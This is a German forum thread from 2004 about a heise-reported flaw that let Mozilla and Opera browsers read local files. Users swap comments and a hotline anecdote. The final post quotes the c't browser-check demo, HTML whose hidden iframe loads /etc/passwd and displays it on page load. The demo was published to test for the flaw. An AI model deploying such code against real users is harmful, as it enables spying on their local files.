Freigeisterhaus Foren-Übersicht
 FAQFAQ   SuchenSuchen   MitgliederlisteMitgliederliste   NutzungsbedingungenNutzungsbedingungen   BenutzergruppenBenutzergruppen   LinksLinks   RegistrierenRegistrieren 
 ProfilProfil   Einloggen, um private Nachrichten zu lesenEinloggen, um private Nachrichten zu lesen   LoginLogin 

Mozilla & Co: Webseiten lesen lokale Dateien

 
Neues Thema eröffnen   Neue Antwort erstellen   Drucker freundliche Ansicht    Freigeisterhaus Foren-Übersicht -> DAU's Paradise
Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
Frank
registrierter User



Anmeldungsdatum: 31.07.2003
Beiträge: 6643

Beitrag(#224906) Verfasst am: 07.12.2004, 12:44    Titel: Mozilla & Co: Webseiten lesen lokale Dateien Antworten mit Zitat

Quelle: http://www.heise.de/newsticker/meldung/53964

Heise hat folgendes geschrieben:

Giovanni Delvecchio weist in einem Posting auf der Sicherheits-Mailingliste Full Disclosure auf ein mögliches Problem der alternativen Browser der Mozilla-Foundation und des norwegischen Software-Herstellers Opera hin: Über einen Trick können Webseiten lokale Dateien ausspionieren.
...
Delvecchio gelang es nicht, auf diesem Weg auch mit dem Internet Explorer lokale Dateien auszulesen. Warum der Microsoft-Browser gegen diesen Trick immun sein sollte, ist allerdings nicht klar.
...
Delvecchio hat die Entwickler von Mozilla und Opera unterrichtet, aber keine Antwort erhalten.
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
Frank
registrierter User



Anmeldungsdatum: 31.07.2003
Beiträge: 6643

Beitrag(#224907) Verfasst am: 07.12.2004, 12:51    Titel: Antworten mit Zitat

Ihr solltet mal (falls nicht schon passiert) den c't-Browsercheck testen. zwinkern
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
frajo
dauerhaft gesperrt



Anmeldungsdatum: 25.08.2003
Beiträge: 11440

Beitrag(#224946) Verfasst am: 07.12.2004, 14:08    Titel: Antworten mit Zitat

Frank hat folgendes geschrieben:
Ihr solltet mal (falls nicht schon passiert) den c't-Browsercheck testen. zwinkern

habe ich gemacht.
erster test: fehlschlag, weil auf meiner kiste keine parttition C: existiert.
zweiter test: fehlschlag, weil auf meiner kiste kein pfad "/" existiert.

im übrigen halte ich dieses "problem" für eines der kategorie "geben sie mir doch bitte ihre kreditkartennummer".
wer dieser bitte nachkommt, kriegt in etwa das, was er verdient.

(ich hatte mal so einen kunden an der hotline: "was kann ich nur machen? jeden monat werden mir 80 DM abgebucht, nachdem ich auf einer amerikanischen porno-seite meine kreditkartennummer eingab. nein, ich habe den rest auf der seite nicht verstanden; ich kann kein englisch.")
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
Blaubär
Höhlenbewohner



Anmeldungsdatum: 18.07.2003
Beiträge: 1133
Wohnort: Mainufer

Beitrag(#224955) Verfasst am: 07.12.2004, 14:25    Titel: Antworten mit Zitat

frajo hat folgendes geschrieben:
(ich hatte mal so einen kunden an der hotline: "was kann ich nur machen? jeden monat werden mir 80 DM abgebucht, nachdem ich auf einer amerikanischen porno-seite meine kreditkartennummer eingab. nein, ich habe den rest auf der seite nicht verstanden; ich kann kein englisch.")


Was hast du dem denn geantwortet?
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
Evilbert
auf eigenen Wunsch deaktiviert



Anmeldungsdatum: 16.09.2003
Beiträge: 42408

Beitrag(#224959) Verfasst am: 07.12.2004, 14:35    Titel: Antworten mit Zitat

Blaubär hat folgendes geschrieben:
frajo hat folgendes geschrieben:
(ich hatte mal so einen kunden an der hotline: "was kann ich nur machen? jeden monat werden mir 80 DM abgebucht, nachdem ich auf einer amerikanischen porno-seite meine kreditkartennummer eingab. nein, ich habe den rest auf der seite nicht verstanden; ich kann kein englisch.")


Was hast du dem denn geantwortet?


Ich hätte geantwortet: "Geben sie mir die Adresse der Seite sowie ihre Kreditkartennummer, ich werde mal gucken, was ich machen kann" zynisches Grinsen
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
frajo
dauerhaft gesperrt



Anmeldungsdatum: 25.08.2003
Beiträge: 11440

Beitrag(#224962) Verfasst am: 07.12.2004, 14:40    Titel: Antworten mit Zitat

Blaubär hat folgendes geschrieben:
frajo hat folgendes geschrieben:
(ich hatte mal so einen kunden an der hotline: "was kann ich nur machen? jeden monat werden mir 80 DM abgebucht, nachdem ich auf einer amerikanischen porno-seite meine kreditkartennummer eingab. nein, ich habe den rest auf der seite nicht verstanden; ich kann kein englisch.")


Was hast du dem denn geantwortet?

ich habe ihm geraten, mit seiner bank über das problem zu sprechen.
viel zeit für längere erörterungen nahm er sich nicht; wohl wegen des minutenpreises von DM 3,60.
außerdem war es ihm hörbar peinlich.
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden
Christian
Wieder (unregelmäßig) da!



Anmeldungsdatum: 18.07.2003
Beiträge: 221
Wohnort: Knittelfeld (Österreich)

Beitrag(#225480) Verfasst am: 08.12.2004, 14:08    Titel: Antworten mit Zitat

Mit Debian-Linux geht bei mir standardmäßig (von Firefox 1.0 aus) der Gnome-Texteditor auf, mit folgendem Text:

Zitat:
<HTML>
<BODY onLoad="ReadFileContent()" >

<iframe id="local_file" name="local_file"
src="file:///etc/passwd"
height=0 width=0>
</iframe>

<script>

function ReadFileContent(){

alert(local_file.document.firstChild.innerHTML);

}

</script>

<h2>c't-Browsercheck-Demo</h2>

<P>Wenn ein Fenster Ihnen den Inhalt der Datei /etc/passwd anzeigt,
hat die Demo funktioniert. Erscheint kein zusätzliches Fenster, ist
sie fehlgeschlagen. Sie können dieses Fenster jetzt schließen.</P>


</body>

</html>

_________________
Ubi dubium, ibi libertas:
Wo der Zweifel ist, da ist die Freiheit.
Lateinisches Sprichwort


Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Website dieses Benutzers besuchen
Beiträge der letzten Zeit anzeigen:   
Neues Thema eröffnen   Neue Antwort erstellen   Drucker freundliche Ansicht    Freigeisterhaus Foren-Übersicht -> DAU's Paradise Alle Zeiten sind GMT + 1 Stunde
Seite 1 von 1

 
Gehe zu:  
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.



Impressum & Datenschutz


Powered by phpBB © 2001, 2005 phpBB Group